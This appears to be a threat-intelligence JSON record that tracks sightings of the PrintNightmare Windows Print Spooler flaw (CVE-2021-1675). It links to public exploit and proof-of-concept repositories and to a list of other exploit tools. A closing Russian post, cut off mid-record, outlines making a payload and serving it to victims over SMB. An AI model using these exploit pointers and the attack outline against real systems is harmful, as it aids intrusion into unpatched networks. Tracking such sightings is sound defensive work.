{"vulnerability": "cve-2021-1675", "sightings": [{"uuid": "1e4de4c0-d2b5-4985-94a2-1810d696c8f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "MISP/c6250a7a-63b1-4996-8734-3ab181e12e3e", "content": "", "creation_timestamp": "2021-09-17T13:28:20.000000Z"}, {"uuid": "105b1dda-41a0-490f-9b3a-5ce9b0ed51a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2021-11-20T09:53:52.000000Z"}, {"uuid": "f3d98f14-223c-4e2d-8e38-ca1a40f8cc1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "MISP/f5030aca-7d5a-43a4-ae03-8f4ac8e85422", "content": "", "creation_timestamp": "2021-11-08T08:58:19.000000Z"}, {"uuid": "8e0b13ab-bc28-4aa3-9371-544c9a6130cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://bsky.app/profile/fidjolakoka.bsky.social/post/3ldtuiiqics2f", "content": "", "creation_timestamp": "2024-12-21T20:40:30.958890Z"}, {"uuid": "d399b505-8129-43b1-a2e0-59776a4771b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2970982", "content": "", "creation_timestamp": "2024-12-24T20:22:37.956125Z"}, {"uuid": "13731da8-548d-40ba-812d-89802e832adb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": 
"CVE-2021-1675", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:44.000000Z"}, {"uuid": "35a6e529-a9bb-4930-8f17-71088afc59a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:33.000000Z"}, {"uuid": "63b20744-096f-409b-a5c1-29fc93dfff3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:09:50.000000Z"}, {"uuid": "61a56a36-e100-4993-b231-239123c2735f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb", "content": "", "creation_timestamp": "2022-05-24T20:48:33.000000Z"}, {"uuid": "c159dbbb-b43a-40d5-9599-e0cb16c47bca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://gist.github.com/Aggerio/9330fd5699568e142d5ba1c5f775d5ce", "content": "", "creation_timestamp": "2025-11-16T15:29:50.000000Z"}, {"uuid": "813565c8-cb59-4d42-988c-d9cf8e71686c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:01:00.000000Z"}, {"uuid": 
"b42e0f80-2611-4c01-b13d-4309847efc18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2021-1675", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-c39acbe0-91886c343547fcce", "content": "", "creation_timestamp": "2025-12-05T12:35:58.929250Z"}, {"uuid": "b3f41dfa-071b-48ae-9b2d-4014fcab3ca1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://gist.github.com/aw-junaid/db57913171b70ac795cfa091a75e90ab", "content": "", "creation_timestamp": "2026-01-30T19:19:22.000000Z"}, {"uuid": "696cb27f-b655-4443-9369-4ad9debef67a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/haavoittuvuus_19/2021", "content": "", "creation_timestamp": "2021-07-01T09:58:27.000000Z"}, {"uuid": "32d898e2-bd6f-40ec-8cec-d1bb6aff0837", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/ecf21bc7-f09d-47c1-9b45-ac691cbd5635", "content": "", "creation_timestamp": "2026-02-02T12:28:56.749052Z"}, {"uuid": "7664a0d3-6974-448a-aea8-8d4013ff0203", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/GithubRedTeam/150", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aTo fight against Windows security breach PrintNightmare! 
(CVE-2021-34527, CVE-2021-1675)\nURL\uff1ahttps://github.com/Tomparte/PrintNightmare", "creation_timestamp": "2021-07-28T08:32:17.000000Z"}, {"uuid": "a549e12a-62ab-44e8-a894-d78fabaf0ed2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/GithubRedTeam/352", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aTo fight against Windows security breach PrintNightmare! (CVE-2021-34527, CVE-2021-1675)\nURL\uff1ahttps://github.com/Tomparte/PrintNightmare", "creation_timestamp": "2021-08-20T11:43:19.000000Z"}, {"uuid": "87c853f1-676a-4df8-810d-8a90b1f9b7ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/GithubRedTeam/909", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-1675 LPE PoC in Nim (PrintNightmare Local Privilege Escalation)\nURL\uff1ahttps://github.com/fumamatar/NimNightmare", "creation_timestamp": "2021-12-05T14:55:43.000000Z"}, {"uuid": "137453c5-bce6-4570-a8d8-6eda0be216ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/908", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-1675 LPE PoC in Nim (PrintNightmare Local Privilege Escalation)\nURL\uff1ahttps://github.com/fumamatar/NimNightmare-", "creation_timestamp": "2021-12-05T14:51:36.000000Z"}, {"uuid": "b5b74273-5e45-4a19-8097-2d948482e662", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/GithubRedTeam/707", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPython implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527)\nURL\uff1ahttps://github.com/ly4k/PrintNightmare", "creation_timestamp": "2021-10-17T13:34:40.000000Z"}, {"uuid": "7bef11e5-f521-4ac1-9a6f-899ce6321261", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/cKure/6057", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 CVE-2021-1675 Windows RCE; video PoC: https://youtu.be/qU3vQ-B-FPY", "creation_timestamp": "2021-07-01T14:12:11.000000Z"}, {"uuid": "267a84da-d9ff-4956-a05e-f75546a8894a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://t.me/cKure/6056", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 CVE-2021-1675 Windows RCE; what we know so far. 
\n\nhttps://www.reddit.com/r/msp/comments/ob6y02/critical_vulnerability_printnightmare_exposes/", "creation_timestamp": "2021-07-01T14:06:17.000000Z"}, {"uuid": "fa712fb2-31c8-4f79-bc39-94c40443ffaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://t.me/cKure/6053", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 EDR  Query to detect CVE-2021-1675\n\nhttps://mobile.twitter.com/_M_Shahnawaz/status/1410529617966997508", "creation_timestamp": "2021-07-01T11:07:55.000000Z"}, {"uuid": "2db5317c-da91-475b-bdb4-168afba0c2cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/cKure/6050", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 CVE-2021-1675: Windows \ud83e\ude9f RCE (untested)\n\nhttps://xss.is/threads/53479/", "creation_timestamp": "2021-07-01T07:44:02.000000Z"}, {"uuid": "09550714-70cd-41fc-a782-d622174ed99d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://t.me/cKure/6062", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 CVE-2021-1675 Windows RCE.", "creation_timestamp": "2021-07-02T10:27:11.000000Z"}, {"uuid": "5143e694-c81f-4a5c-bfde-028472814883", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://gist.github.com/polirise-och5ty-long/0553d1b567d5e4e4c05bd4bd470b77bf", "content": "", "creation_timestamp": "2026-04-19T17:35:28.000000Z"}, {"uuid": "df672bcc-eeeb-4cab-872b-6ee51fff8fdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://gist.github.com/polirise-och5ty-long/921c7aa9360839078ec5ad52cee75648", "content": "", "creation_timestamp": "2026-04-19T17:37:51.000000Z"}, {"uuid": "9492eae4-8765-4fa9-8a09-05650b4865a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://gist.github.com/polirise-och5ty-long/26f16159ab0369f7b5368e757a208f61", "content": "", "creation_timestamp": "2026-04-19T17:39:00.000000Z"}, {"uuid": "1207e831-be22-43ed-8a2e-e2272983867a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "MISP/ed3db5cb-9b15-4548-871d-ed4c22b479a6", "content": "", "creation_timestamp": "2026-04-19T21:02:39.000000Z"}, {"uuid": "b14621c3-7d04-4b9a-b9ff-8b63811c7b62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "Telegram/HXnB78LZ993EnbGXdL2hofKwYDoKHSeDPKMDrtCNi3QDgzw", "content": "", "creation_timestamp": "2025-08-14T09:00:04.000000Z"}, {"uuid": "9b7ec4bc-0ceb-4111-851d-49336726b160", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "Telegram/PHoJQGmgGzsQrC8Gnxfc8pLZD55xgKQzGqHQgQ7hPSbJXl0", "content": "", "creation_timestamp": "2025-11-19T15:00:09.000000Z"}, {"uuid": "0a63f505-1c25-481e-bd33-3fe543538f17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": 
"https://gist.github.com/quocchau/c4a202ad3ca93e341584a773ac17398f", "content": "", "creation_timestamp": "2026-04-28T05:27:45.000000Z"}, {"uuid": "00c15991-a567-4d17-ba05-5e9a18ad35ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/cKure/6036", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 PrintNightmare (CVE-2021-1675): Remote code execution in Windows Spooler Service\n\nhttps://github.com/afwu/PrintNightmare", "creation_timestamp": "2021-06-30T15:35:49.000000Z"}, {"uuid": "961cfe31-05ac-4219-ab08-5df5e356eab1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/antichat/9768", "content": "PrintNightmare (CVE-2021-1675): Remote code execution in Windows Spooler Service\n\nhttps://github.com/afwu/PrintNightmare\n\n#exploit #git", "creation_timestamp": "2021-06-29T17:45:58.000000Z"}, {"uuid": "bb7223c6-0c4b-4b8c-93ac-738c0ddd1f8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/ics_cert/452", "content": "\u0647\u0634\u062f\u0627\u0631\n\n\u0633\u0631\u0648\u06cc\u0633 Print.Spooler \u062f\u0631 \u0645\u0639\u0631\u0636 \u062a\u0647\u062f\u06cc\u062f\n\u0627\u062e\u06cc\u0631\u0627\u064b \u0628\u0631\u0627\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc CVE-2021-1675 \u06a9\u0647 \u062f\u0631 \u0645\u0648\u0631\u062f Print.Spooler \u0648\u06cc\u0646\u062f\u0648\u0632 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0634\u062f\u0647 \u0628\u0648\u062f poc \u0645\u0646\u062a\u0634\u0631 \u0634\u062f\u0647 \u0627\u0633\u062a. 
\u0628\u0627 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u06cc\u0646 \u062d\u0641\u0631\u0647 \u0627\u0645\u0646\u06cc\u062a\u06cc \u0627\u0645\u06a9\u0627\u0646 \u062d\u0645\u0644\u0627\u062a RCE \u0641\u0631\u0627\u0647\u0645 \u0627\u0633\u062a.\n\u2705\u062a\u0627 \u0632\u0645\u0627\u0646 \u0627\u0631\u0627\u0626\u0647 \u0648\u0635\u0644\u0647 \u0627\u0645\u0646\u06cc\u062a\u06cc \u062a\u0648\u0633\u0637 \u0645\u0627\u06a9\u0631\u0648\u0633\u0627\u0641\u062a\u060c \u062a\u0648\u0635\u06cc\u0647 \u0645\u06cc \u0634\u0648\u062f \u0627\u06cc\u0646 \u0633\u0631\u0648\u06cc\u0633 \u063a\u06cc\u0631 \u0641\u0639\u0627\u0644 \u06af\u0631\u062f\u062f.\n\n\ud83d\udc6e\u200d\u2640\ufe0f\ud83d\udc6e\u200d\u2640\ufe0f \u0628\u0627\u0632\u0646\u0634\u0631 \u0645\u0637\u0627\u0644\u0628 \u0627\u06cc\u0646 \u06a9\u0627\u0646\u0627\u0644 \u0635\u0631\u0641\u0627 \u0628\u0627 \u0630\u06a9\u0631 \u0645\u0646\u0628\u0639 \u0648 \u0622\u062f\u0631\u0633 \u06a9\u0627\u0645\u0644 \u06a9\u0627\u0646\u0627\u0644 \u0645\u062c\u0627\u0632 \u0645\u06cc\u0628\u0627\u0634\u062f.\n\n\ud83c\udfed\u0648\u0628\u0633\u0627\u06cc\u062a \u0648 \u06a9\u0627\u0646\u0627\u0644 \u062a\u062e\u0635\u0635\u06cc \u0627\u0645\u0646\u06cc\u062a \u0632\u06cc\u0631\u0633\u0627\u062e\u062a\u0647\u0627\u06cc \u0627\u062a\u0648\u0645\u0627\u0633\u06cc\u0648\u0646 \u0648 \u06a9\u0646\u062a\u0631\u0644 \u0635\u0646\u0639\u062a\u06cc\n\n\u0627\u062f\u0645\u06cc\u0646:\nhttps://t.me/pedram_kiani\n\u06a9\u0627\u0646\u0627\u0644 \u062a\u0644\u06af\u0631\u0627\u0645:\nhttps://t.me/ics_cert\n\u062a\u0648\u06cc\u06cc\u062a\u0631:\nhttps://twitter.com/icscerti", "creation_timestamp": "2021-07-02T17:33:04.000000Z"}, {"uuid": "da7b9341-9fd3-4c57-b229-f6e17989875f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": 
"https://t.me/ics_cert/453", "content": "\u26d4\ufe0f \u0647\u0634\u062f\u0627\u0631: \u0627\u0646\u062a\u0634\u0627\u0631 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0628\u0631\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u062d\u0631\u0627\u0646\u06cc\nPrintNightmare (CVE-2021-1675): Remote code execution in Windows Spooler Service\n\n\u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u062d\u0631\u0627\u0646\u06cc \u0628\u0648\u062f\u0647 \u0648 \u062a\u0645\u0627\u0645\u06cc \u0633\u06cc\u0633\u062a\u0645\u200c\u0639\u0627\u0645\u0644\u200c\u0647\u0627\u06cc \u0648\u06cc\u0646\u062f\u0648\u0632\u06cc \u0631\u0627 \u062a\u062d\u062a \u062a\u0627\u062b\u06cc\u0631 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u0647 \u0648 \u0627\u0646\u062a\u0634\u0627\u0631 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0622\u0646 \u0628\u0635\u0648\u0631\u062a \u0639\u0645\u0648\u0645\u06cc \u0648 \u06af\u0633\u062a\u0631\u062f\u0647 \u0628\u0633\u06cc\u0627\u0631 \u062d\u0633\u0627\u0633 \u0648 \u062e\u0637\u0631\u0646\u0627\u06a9 \u0627\u0633\u062a.\n\n\u0628\u0631\u0627\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0628\u06cc\u0634\u062a\u0631 \u0628\u0647 \u0644\u06cc\u0646\u06a9\u200c\u0647\u0627\u06cc \u0632\u06cc\u0631 \u0645\u0631\u0627\u062c\u0639\u0647 \u06a9\u0646\u06cc\u062f:\n\n\ud83c\udf10 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675\n\n\ud83c\udf10 https://github.com/afwu/PrintNightmare\n\n\ud83c\udf10 https://github.com/cube0x0/CVE-2021-1675\n\n\ud83d\udc6e\u200d\u2640\ufe0f\ud83d\udc6e\u200d\u2640\ufe0f \u0628\u0627\u0632\u0646\u0634\u0631 \u0645\u0637\u0627\u0644\u0628 \u0627\u06cc\u0646 \u06a9\u0627\u0646\u0627\u0644 \u0635\u0631\u0641\u0627 \u0628\u0627 \u0630\u06a9\u0631 \u0645\u0646\u0628\u0639 \u0648 \u0622\u062f\u0631\u0633 \u06a9\u0627\u0645\u0644 \u06a9\u0627\u0646\u0627\u0644 \u0645\u062c\u0627\u0632 
\u0645\u06cc\u0628\u0627\u0634\u062f.\n\n\ud83c\udfed\u0648\u0628\u0633\u0627\u06cc\u062a \u0648 \u06a9\u0627\u0646\u0627\u0644 \u062a\u062e\u0635\u0635\u06cc \u0627\u0645\u0646\u06cc\u062a \u0632\u06cc\u0631\u0633\u0627\u062e\u062a\u0647\u0627\u06cc \u0627\u062a\u0648\u0645\u0627\u0633\u06cc\u0648\u0646 \u0648 \u06a9\u0646\u062a\u0631\u0644 \u0635\u0646\u0639\u062a\u06cc\n\n\u0627\u062f\u0645\u06cc\u0646:\nhttps://t.me/pedram_kiani\n\u06a9\u0627\u0646\u0627\u0644 \u062a\u0644\u06af\u0631\u0627\u0645:\nhttps://t.me/ics_cert\n\u062a\u0648\u06cc\u06cc\u062a\u0631:\nhttps://twitter.com/icscerti", "creation_timestamp": "2021-07-02T17:41:34.000000Z"}, {"uuid": "876a0274-545f-42c9-ad6d-925e2a9b1834", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/NinjaSec/290", "content": "1. https://github.com/Sachinart/CVE-2025-32432\nCheck for CVE-2025-32432 vulnerability\n#github #exploit\n\n\n2. https://github.com/helidem/CVE-2025-24054-PoC\nProof of Concept for NTLM Hash Leak via .library-ms CVE-2025-24054\n#github #poc\n\n\n3. https://github.com/ajdumanhug/CVE-2023-46818\nCVE-2023-46818 Python3 Exploit for ISPConfig &lt;= 3.2.11 PHP Code Injection\n#github #exploit\n\n\n4. https://github.com/0x6rss/CVE-2025-24071_PoC\nNTLM hash leak via .library-ms inside ZIP/RAR (CVE-2025-24071)\n#github #poc\n\n\n5. https://github.com/trickest/cve/blob/main/2022/CVE-2022-42092.md\nCVE-2022-42092 \u2013 Backdrop CMS RCE PoC\n#github #exploit\n\n\n6. https://github.com/nomi-sec/PoC-in-GitHub\nAggregated CVE Exploits and PoCs from GitHub\n#github #tool\n\n\n7. https://github.com/SofianeHamlaoui/CVE-2022-0492-Checker\nLinux Container Escape CVE-2022-0492 vulnerability checker\n#github #exploit\n\n\n8. https://github.com/xigney/CVE-2025-24054_PoC\nAlternate NTLM Hash Leak via .library-ms CVE-2025-24054\n#github #poc\n\n\n9. 
https://github.com/bipbopbup/CVE-2023-46818-python-exploit\nPython PoC for CVE-2023-46818 in ISPConfig\n#github #exploit\n\n\n10. https://github.com/Marcejr117/CVE-2025-24071_PoC\nNTLM Hash Leak using .library-ms via ZIP trick (CVE-2025-24071)\n#github #poc\n\n\n11. https://github.com/Ostorlab/KEV\nKnown Exploited Vulnerabilities Detector\n#github #scanner\n\n\n12. https://github.com/edoardottt/missing-cve-nuclei-templates\nMissing CVE Detection via Nuclei Templates\n#github #scanner\n\n\n13. https://github.com/hyp3rlinx/Advisories\nZero-Day Security Advisories and Exploits by Hyp3rlinx\n#github #exploit\n\n\n14. https://github.com/Kubashok/apple-cve-repos\nApple CVE Database Links Repository\n#github #cve\n\n\n15. https://github.com/esnet/Seccubus_v2\nSeccubus Test Data for Vulnerability Scanners\n#github #tool\n\n\n16. https://github.com/skordemir/Xml2Ontology\nNessus XML Vulnerability Report Samples\n#github #data\n\n\n17. https://github.com/madirish/hector\nHector: Vulnerability Management Tool with Sample Nessus Reports\n#github #tool\n\n\n18. https://github.com/projectdiscovery/nuclei-templates/issues/8804\nNuclei Template request for ISPConfig CVE-2023-46818\n#github #scanner\n\n\n19. https://github.com/projectdiscovery/nuclei-templates/issues/12020\nNuclei Template PoC Request for CraftCMS CVE-2025-32432\n#github #scanner\n\n\n20. https://github.com/tanjiti/sec_profile\nSecurity Profile Aggregator \u2013 CVE, CISA, NVD, etc.\n#github #intel\n\n\n21. https://github.com/cube0x0/CVE-2021-1675\nPrintNightmare Exploit PoC (CVE-2021-1675 / CVE-2021-34527)\n#github #exploit\n\n22. https://github.com/Maldev-Academy/LsassHijackingViaReg\n\nInjecting DLL into LSASS at boot\n#github #tools\n\n\nOpen-source tools and proof-of-concept (PoC) repositories related to recent CVEs, exploits, and security research. 
These resources are valuable for educational purposes and can aid students in understanding real-world vulnerabilities and exploitation techniques.", "creation_timestamp": "2025-05-05T10:30:13.000000Z"}, {"uuid": "5447ce54-e306-4def-ab55-8ad053bd2dc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "Telegram/maf2TFOSyoSTf8xOkgyu0UgeCyGF21FfgwtUN3M8h6X6o90", "content": "", "creation_timestamp": "2025-08-24T15:00:06.000000Z"}, {"uuid": "76671d8b-bb5e-4163-96d7-76deb88a417a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "Telegram/JxyyR7DPCkvNqGXHwYf1FM_TYIK_7LUKbzPocNJOIh8q_94", "content": "", "creation_timestamp": "2025-08-05T21:00:04.000000Z"}, {"uuid": "8f57ea55-06cb-430d-bb6b-84978d648bdf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/poxek/510", "content": "PrintNightmare (CVE-2021-1675)\n\u0414\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u0430 \u043d\u0430 \u043c\u043d\u043e\u0433\u0438\u0445 \u043c\u0430\u0448\u0438\u043d\u0430\u0445 \u0432 \u0441\u0435\u0442\u0438 \u0441 AD-DC. \n\u0412\u0430\u043c \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u043f\u044d\u0439\u043b\u043e\u0430\u0434 \u0438 \u0440\u0430\u0437\u0434\u0430\u0442\u044c \u0435\u0433\u043e \u0436\u0435\u0440\u0442\u0432\u0430\u043c, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f SMB-\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b. 
